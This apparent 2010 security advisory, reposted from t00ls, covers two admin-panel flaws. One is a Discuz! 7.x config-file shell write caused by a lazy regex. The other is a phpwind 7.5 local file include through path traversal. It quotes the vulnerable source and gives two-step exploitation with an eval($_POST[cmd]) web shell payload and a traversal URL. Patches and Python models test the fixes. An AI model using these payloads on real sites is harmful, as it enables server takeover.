Discuz! 7.0-7.2 & Phpwind 7.5 admin-panel low-value ("chicken-rib") vulnerabilities - vulnerability warning - the black bar safety net

2010-01-16T00:00:00
ID MYHACK58:62201025948
Type myhack58
Reporter Anonymous (佚名)
Modified 2010-01-16T00:00:00

Description


Reposted from t00ls

Many people already have these, they have spread around, so here they are. These days, asking whether a vulnerability should be published on one's own initiative gets a definite "no, don't publish", otherwise it stays hidden until someone else posts it. The DZ bug is low-value because it needs founder privileges, and the founder password is generally hard to get; the PW bug is low-value because it needs a truncation trick, or, on Linux, a shell written into tmp beforehand.

One: Discuz admin settings.inc.php shell-write vulnerability

Vulnerability details:

    if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) {
        $ucdbpassnew = $settingsnew['uc']['dbpass'] == '**' ? UC_DBPW : $settingsnew['uc']['dbpass'];
        if($settingsnew['uc']['connect']) {
            $uc_dblink = @mysql_connect($settingsnew['uc']['dbhost'], $settingsnew['uc']['dbuser'], $ucdbpassnew, 1);
            if(!$uc_dblink) {
                cpmsg('uc_database_connect_error', '', 'error');
            } else {
                mysql_close($uc_dblink);
            }
        }

        $fp = fopen('./config.inc.php', 'r');
        $configfile = fread($fp, filesize('./config.inc.php'));
        $configfile = trim($configfile);
        $configfile = substr($configfile, -2) == '?>' ? substr($configfile, 0, -2) : $configfile;
        fclose($fp);

        $connect = '';
        if($settingsnew['uc']['connect']) {
            require './config.inc.php';
            $connect = 'mysql';
            $samelink = ($dbhost == $settingsnew['uc']['dbhost'] && $dbuser == $settingsnew['uc']['dbuser'] && $dbpw == $ucdbpassnew);
            $samecharset = !($dbcharset == 'gbk' && UC_DBCHARSET == 'latin1' || $dbcharset == 'latin1' && UC_DBCHARSET == 'gbk');
            // the regex replaces from the opening ' up to the first '); and that '); can itself be supplied in the submitted value -- oldjun.com
            $configfile = insertconfig($configfile, "/define\('UC_DBHOST',\s'.*?'\);/i", "define('UC_DBHOST', '".$settingsnew['uc']['dbhost']."');");
            $configfile = insertconfig($configfile, "/define\('UC_DBUSER',\s'.*?'\);/i", "define('UC_DBUSER', '".$settingsnew['uc']['dbuser']."');");
            $configfile = insertconfig($configfile, "/define\('UC_DBPW',\s'.*?'\);/i", "define('UC_DBPW', '".$ucdbpassnew."');");
            $configfile = insertconfig($configfile, "/define\('UC_DBNAME',\s'.*?'\);/i", "define('UC_DBNAME', '".$settingsnew['uc']['dbname']."');");
            $configfile = insertconfig($configfile, "/define\('UC_DBTABLEPRE',\s'.*?'\);/i", "define('UC_DBTABLEPRE', '`".$settingsnew['uc']['dbname']."`.".$settingsnew['uc']['dbtablepre']."');");
            //$configfile = insertconfig($configfile, "/define\('UC_LINK',\s'?.*?'?\);/i", "define('UC_LINK', ".($samelink && $samecharset ? 'TRUE' : 'FALSE').");");
        }
        $configfile = insertconfig($configfile, "/define\('UC_CONNECT',\s'.*?'\);/i", "define('UC_CONNECT', '$connect');");
        $configfile = insertconfig($configfile, "/define\('UC_KEY',\s'.*?'\);/i", "define('UC_KEY', '".$settingsnew['uc']['key']."');");
        $configfile = insertconfig($configfile, "/define\('UC_API',\s'.*?'\);/i", "define('UC_API', '".$settingsnew['uc']['api']."');");
        $configfile = insertconfig($configfile, "/define\('UC_IP',\s'.*?'\);/i", "define('UC_IP', '".$settingsnew['uc']['ip']."');");
        $configfile = insertconfig($configfile, "/define\('UC_APPID',\s'?.*?'?\);/i", "define('UC_APPID', '".$settingsnew['uc']['appid']."');");

        $fp = fopen('./config.inc.php', 'w');
        if(!($fp = @fopen('./config.inc.php', 'w'))) {
            cpmsg('uc_config_write_error', '', 'error');
        }
        @fwrite($fp, trim($configfile));
        @fclose($fp);
    }

settings.inc.php does not effectively filter the submitted data, so a `')` can be written into the saved value and pollute the configuration file. Because the lazy regex in insertconfig() stops at the first `');` instead of the real end of the define() line, submitting twice bypasses daddslashes and writes a shell into the configuration file.

    function insertconfig($s, $find, $replace) {
        if(preg_match($find, $s)) {
            $s = preg_replace($find, $replace, $s); // regex match and replace of the existing line
        } else {
            $s .= "\r\n".$replace;
        }
        return $s;
    }

Vulnerability test:

Step one: write the polluting value into UC_IP (UC_IP is optional; whatever is written there normally does not affect the program): submit xxx');eval($_POST[cmd])?> and save. daddslashes escapes the quote, so at this point the file still holds the payload inside a string literal.

Step two: submit UC_IP again with just aaa. The regex now matches only up to the first '); (the one that was escaped in step one) and closes the new define() there, so the eval() that follows it is left outside the string and becomes live PHP.

Temporary patch:

Directly under if($operation == 'uc' && is_writeable('./config.inc.php') && $isfounder) { add:

    foreach($settingsnew['uc'] as $key => $value) {
        $settingsnew['uc'][$key] = str_replace(')', '', $value);
    }

This works because the premature terminator '); needs a ) to exist in the saved value; without it the lazy regex runs on to the genuine end of the line.
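The two-step write described above, modelled in Python as an added example (this is not part of the original post and not Discuz's own code). The UC_IP regex and the insertconfig() logic are ported from the PHP above, daddslashes() is modelled as PHP addslashes(), the config file contents are constructed, and the `)`-stripping guard from the temporary patch above is run through the same two submissions for comparison.

```python
import re

# Same pattern Discuz! 7.x uses for the UC_IP line: case-insensitive and lazy (.*?),
# so the match ends at the FIRST "');" after the opening quote.
UC_IP_PATTERN = re.compile(r"define\('UC_IP',\s'.*?'\);", re.IGNORECASE)

# Constructed stand-in for config.inc.php; only the lines that matter here.
ORIGINAL_CONFIG = "<?php\r\ndefine('UC_IP', '');\r\ndefine('UC_APPID', '1');"

# Step-one value from the advisory.
PAYLOAD = "xxx');eval($_POST[cmd])?>"

# Matches eval( that follows an UNescaped '); i.e. eval that sits outside a string.
LIVE_EVAL = re.compile(r"(?<!\\)'\);eval\(")


def daddslashes(value: str) -> str:
    """Model of Discuz's daddslashes(): PHP addslashes() on the submitted value."""
    return (value.replace("\\", "\\\\")
                 .replace("'", "\\'")
                 .replace('"', '\\"'))


def insertconfig(s: str, find: re.Pattern, replace: str) -> str:
    """Port of insertconfig(): preg_replace() the match, else append the line."""
    if find.search(s):
        # A lambda keeps backslashes and $ in `replace` literal, as preg_replace does.
        return find.sub(lambda _m: replace, s)
    return s + "\r\n" + replace


def save_uc_ip(configfile: str, submitted: str) -> str:
    """One admin 'UC settings' save, reduced to the UC_IP line."""
    value = daddslashes(submitted)
    return insertconfig(configfile, UC_IP_PATTERN, "define('UC_IP', '" + value + "');")


def save_uc_ip_patched(configfile: str, submitted: str) -> str:
    """Same save with the advisory's temporary patch applied: ')' is stripped,
    so the value can never contain the "');" terminator the lazy regex stops at."""
    return save_uc_ip(configfile, submitted.replace(")", ""))


def two_step(save=save_uc_ip, config: str = ORIGINAL_CONFIG) -> str:
    """Run the advisory's two submissions through `save`; return the final file."""
    after_first = save(config, PAYLOAD)  # quote escaped to \' -> still inert
    return save(after_first, "aaa")      # lazy match cuts at the first "');"


def is_backdoored(configfile: str) -> bool:
    """True when eval() ended up outside a string literal, i.e. live PHP."""
    return LIVE_EVAL.search(configfile) is not None


if __name__ == "__main__":
    print(two_step())                    # unpatched: eval() is now top-level code
    print(two_step(save_uc_ip_patched))  # patched: UC_IP is simply 'aaa'
```

The unpatched run ends with `define('UC_IP', 'aaa');eval($_POST[cmd])?>');`: the `?>` leaves PHP mode so the dangling `');` is harmless output, and the eval() runs on every request that loads config.inc.php. With the `)` stripped the first save stores `xxx\';eval($_POST[cmd]?>` and the second save's lazy match runs on to the genuine terminator, so the whole line is replaced cleanly.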

Two: phpwind admin local file include vulnerability

Vulnerability details:

File: hack\rate\admin.php. Source:

    <?php
    !function_exists('readover') && exit('Forbidden');
    define("H_R", R_P . "hack/rate/");
    define("L_R", R_P . "lib/");
    InitGP(array('ajax'));
    $action = strtolower(($job) ? $job : "admin");
    $filepath = H_R . "action/" . $action . "Action.php";

    (!file_exists($filepath)) && exit();

    if ($job != "ajax") {
        require H_R . '/template/layout.php';
    } else {
        require_once $filepath;
    }

    ?>

Now look at hack\rate\template\layout.php:

    <?php
    !function_exists('readover') && exit('Forbidden');
    include_once PrintEot('left');
    print <<<EOT
    -->
    EOT;
    require_once $filepath;
    include_once PrintEot('adminbottom');
    ?>

$job is attacker-controlled and reaches require_once on both branches, which is a local include. It has been through addslashes, so it cannot be truncated with %00; but it can be truncated with a large number of / characters, or one can simply write a shell into the tmp folder and include it. Without going into detail, the approach is:

Vulnerability test:

First upload a shell named Action.php into tmp, then visit: http://127.0.0.1/pw/admin.php?ad ... ../../../../../tmp/

Temporary patch:

Replace:

    $filepath = H_R . "action/" . $action . "Action.php";

with:

    $filepath = Pcv(H_R . "action/" . $action . "Action.php");
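The path construction behind the include, modelled in Python as an added example (not part of the original post and not phpwind's own code). The vulnerable line is ported from hack\rate\admin.php above; the on-disk layout (R_P = /www/pw/) is assumed, and the hardened variant is this editor's own whitelist-plus-containment check, not phpwind's Pcv(). The post's other trick, padding the path with many / until the appended suffix is cut off, relied on the path-length truncation of older PHP builds and is not modelled here.

```python
import os
import re

# Assumed layout (hypothetical): R_P is the phpwind root, H_R = R_P . "hack/rate/".
R_P = "/www/pw/"
H_R = R_P + "hack/rate/"

# Whitelist for the action name: nothing but [a-z0-9_], so no separators or dots.
ACTION_NAME = re.compile(r"[a-z0-9_]+")


def build_action_path(job: str = "") -> str:
    """Port of the vulnerable line in hack/rate/admin.php:
        $filepath = H_R . "action/" . strtolower($job ? $job : "admin") . "Action.php";
    addslashes() has already run on $job, so a %00 byte cannot cut the suffix off;
    the included file therefore always ends in 'Action.php'."""
    action = (job if job else "admin").lower()
    return H_R + "action/" + action + "Action.php"


def resolved(path: str) -> str:
    """Where the include actually lands once the '..' segments collapse."""
    return os.path.normpath(path)


def build_action_path_safe(job: str = "") -> str:
    """Hardened variant (added here): whitelist the action name, then refuse any
    result that does not stay inside H_R/action/ even after normalisation."""
    action = (job if job else "admin").lower()
    if not ACTION_NAME.fullmatch(action):
        raise ValueError("invalid action name: %r" % job)
    base = os.path.normpath(H_R + "action") + os.sep
    path = os.path.normpath(os.path.join(base, action + "Action.php"))
    if not path.startswith(base):
        raise ValueError("path escapes action directory: %r" % job)
    return path


def rejects(job: str) -> bool:
    """True if the hardened builder refuses this $job value."""
    try:
        build_action_path_safe(job)
    except ValueError:
        return False if False else True
    return False


if __name__ == "__main__":
    traversal = "../../../../../tmp/"
    print(build_action_path(traversal))            # raw string handed to require_once
    print(resolved(build_action_path(traversal)))  # /tmp/Action.php -> the uploaded shell
    print(build_action_path_safe("ajax"))          # /www/pw/hack/rate/action/ajaxAction.php
    print(rejects(traversal))                      # True
```

The number of ../ segments needed depends on how deep hack/rate/action/ sits below the filesystem root, which is why the shell has to be dropped at a path the attacker can predict (tmp) under a name that matches the fixed suffix (Action.php). The containment check in the hardened variant is redundant with the whitelist, which is deliberate: if the whitelist is ever loosened, the prefix test still holds the line.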